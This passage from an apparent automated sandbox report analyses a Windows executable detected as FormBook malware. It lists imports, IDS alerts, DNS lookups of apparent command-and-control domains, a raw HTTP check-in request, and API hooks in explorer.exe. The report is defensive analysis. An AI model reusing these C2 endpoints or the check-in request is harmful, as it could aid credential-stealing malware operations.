                                                                                                                                                                          RT_ICON0xc98400x6ed1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9985195107335472
                                                                                                                                                                          RT_ICON0xd07140xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.570362473347548
                                                                                                                                                                          RT_ICON0xd15bc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.6430505415162455
                                                                                                                                                                          RT_ICON0xd1e640x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishGreat Britain0.5616359447004609
                                                                                                                                                                          RT_ICON0xd252c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.4125722543352601
                                                                                                                                                                          RT_ICON0xd2a940x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.13950668401750857
                                                                                                                                                                          RT_ICON0xe32bc0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.22774332562539415
                                                                                                                                                                          RT_ICON0xec7640x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishGreat Britain0.23240601503759398
                                                                                                                                                                          RT_ICON0xf2f4c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.25914972273567466
                                                                                                                                                                          RT_ICON0xf83d40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.24728389230042513
                                                                                                                                                                          RT_ICON0xfc5fc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3354771784232365
                                                                                                                                                                          RT_ICON0xfeba40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.3778142589118199
                                                                                                                                                                          RT_STRING0xffc4c0x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                          RT_STRING0x1001e00x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                          RT_STRING0x10086c0x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                          RT_STRING0x100cfc0x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                          RT_STRING0x1012f80x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                          RT_STRING0x1019540x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                          RT_STRING0x101dbc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                          RT_RCDATA0x101f140x455acdata1.0003379377349724
                                                                                                                                                                          RT_GROUP_ICON0x1474c00x102dataEnglishGreat Britain0.6124031007751938
                                                                                                                                                                          RT_GROUP_ICON0x1475c40x14dataEnglishGreat Britain1.15
                                                                                                                                                                          RT_VERSION0x1475d80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                          RT_MANIFEST0x1476b40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                          UxTheme.dllIsThemeActive
                                                                                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishGreat Britain

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-11-04T03:14:22.217043+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549706TCP
                                                                                                                                                                          2024-11-04T03:14:39.357291+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549796199.59.243.22780TCP
                                                                                                                                                                          2024-11-04T03:14:39.357291+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549796199.59.243.22780TCP
                                                                                                                                                                          2024-11-04T03:14:39.357291+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549796199.59.243.22780TCP
                                                                                                                                                                          2024-11-04T03:15:01.278188+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549902TCP

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Nov 4, 2024 03:14:38.854403019 CET4979680192.168.2.5199.59.243.227
                                                                                                                                                                          Nov 4, 2024 03:14:38.859361887 CET8049796199.59.243.227192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:14:38.859433889 CET4979680192.168.2.5199.59.243.227
                                                                                                                                                                          Nov 4, 2024 03:14:38.859510899 CET4979680192.168.2.5199.59.243.227
                                                                                                                                                                          Nov 4, 2024 03:14:38.864276886 CET8049796199.59.243.227192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:14:39.348854065 CET4979680192.168.2.5199.59.243.227
                                                                                                                                                                          Nov 4, 2024 03:14:39.354355097 CET8049796199.59.243.227192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:14:39.357290983 CET4979680192.168.2.5199.59.243.227

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Nov 4, 2024 03:14:38.662542105 CET5272953192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:14:38.853774071 CET53527291.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:14:59.505573988 CET5664253192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:14:59.515199900 CET53566421.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:15:18.974359989 CET6428053192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:15:18.983366966 CET53642801.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:15:39.709173918 CET6466853192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:15:39.717786074 CET53646681.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:16:00.523462057 CET6194753192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:16:00.547622919 CET53619471.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:16:21.183387995 CET6475253192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:16:21.191365957 CET53647521.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:16:41.711688042 CET5649653192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:16:41.728069067 CET53564961.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:17:02.675270081 CET6124453192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:17:03.661868095 CET6124453192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:17:03.788278103 CET53612441.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:17:03.788292885 CET53612441.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:17:23.400170088 CET6440353192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:17:23.409156084 CET53644031.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:18:06.021836042 CET6267753192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:18:06.030236959 CET53626771.1.1.1192.168.2.5
                                                                                                                                                                          Nov 4, 2024 03:18:27.708919048 CET5292753192.168.2.51.1.1.1
                                                                                                                                                                          Nov 4, 2024 03:18:27.724127054 CET53529271.1.1.1192.168.2.5

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Nov 4, 2024 03:14:38.662542105 CET192.168.2.51.1.1.10x56cStandard query (0)www.9net88.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:14:59.505573988 CET192.168.2.51.1.1.10xe87aStandard query (0)www.lasterdeals.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:15:18.974359989 CET192.168.2.51.1.1.10x8175Standard query (0)www.eloshost.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:15:39.709173918 CET192.168.2.51.1.1.10x4644Standard query (0)www.lray-civil.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:00.523462057 CET192.168.2.51.1.1.10x799Standard query (0)www.ool-covers76.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:21.183387995 CET192.168.2.51.1.1.10x453bStandard query (0)www.azl.proA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:41.711688042 CET192.168.2.51.1.1.10xf047Standard query (0)www.ithin-ksvodn.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:02.675270081 CET192.168.2.51.1.1.10xaa71Standard query (0)www.g18q11a.topA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:03.661868095 CET192.168.2.51.1.1.10xaa71Standard query (0)www.g18q11a.topA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:23.400170088 CET192.168.2.51.1.1.10xc5fbStandard query (0)www.rowadservepros.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:18:06.021836042 CET192.168.2.51.1.1.10x2fb3Standard query (0)www.ridesmaidgiftsboutiqueki.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:18:27.708919048 CET192.168.2.51.1.1.10xde4aStandard query (0)www.elonix-traceglow.proA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Nov 4, 2024 03:14:38.853774071 CET1.1.1.1192.168.2.50x56cNo error (0)www.9net88.net94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:14:38.853774071 CET1.1.1.1192.168.2.50x56cNo error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:14:59.515199900 CET1.1.1.1192.168.2.50xe87aName error (3)www.lasterdeals.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:15:18.983366966 CET1.1.1.1192.168.2.50x8175Name error (3)www.eloshost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:15:39.717786074 CET1.1.1.1192.168.2.50x4644Name error (3)www.lray-civil.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:00.547622919 CET1.1.1.1192.168.2.50x799Name error (3)www.ool-covers76.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:21.191365957 CET1.1.1.1192.168.2.50x453bName error (3)www.azl.prononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:16:41.728069067 CET1.1.1.1192.168.2.50xf047Name error (3)www.ithin-ksvodn.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:03.788278103 CET1.1.1.1192.168.2.50xaa71Name error (3)www.g18q11a.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:03.788292885 CET1.1.1.1192.168.2.50xaa71Name error (3)www.g18q11a.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:17:23.409156084 CET1.1.1.1192.168.2.50xc5fbName error (3)www.rowadservepros.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:18:06.030236959 CET1.1.1.1192.168.2.50x2fb3Name error (3)www.ridesmaidgiftsboutiqueki.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 4, 2024 03:18:27.724127054 CET1.1.1.1192.168.2.50xde4aName error (3)www.elonix-traceglow.prononenoneA (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • www.9net88.net

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.549796199.59.243.227801028C:\Windows\explorer.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Nov 4, 2024 03:14:38.859510899 CET158OUTGET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1
                                                                                                                                                                          Host: www.9net88.net
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Code Manipulations

                                                                                                                                                                          User Modules

                                                                                                                                                                          Hook Summary

                                                                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                                                                                                          GetMessageWINLINEexplorer.exe
                                                                                                                                                                          GetMessageAINLINEexplorer.exe

                                                                                                                                                                          Processes

                                                                                                                                                                          Process: explorer.exe, Module: user32.dll
                                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE4
                                                                                                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE4
                                                                                                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE4
                                                                                                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE4

                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:21:13:59
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\PI916810.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PI916810.exe"
                                                                                                                                                                          Imagebase:0x460000
                                                                                                                                                                          File size:1'352'192 bytes
                                                                                                                                                                          MD5 hash:DC96F5AE5ADE3E42324FA9C34BC6A43D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:21:14:00
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PI916810.exe"
                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
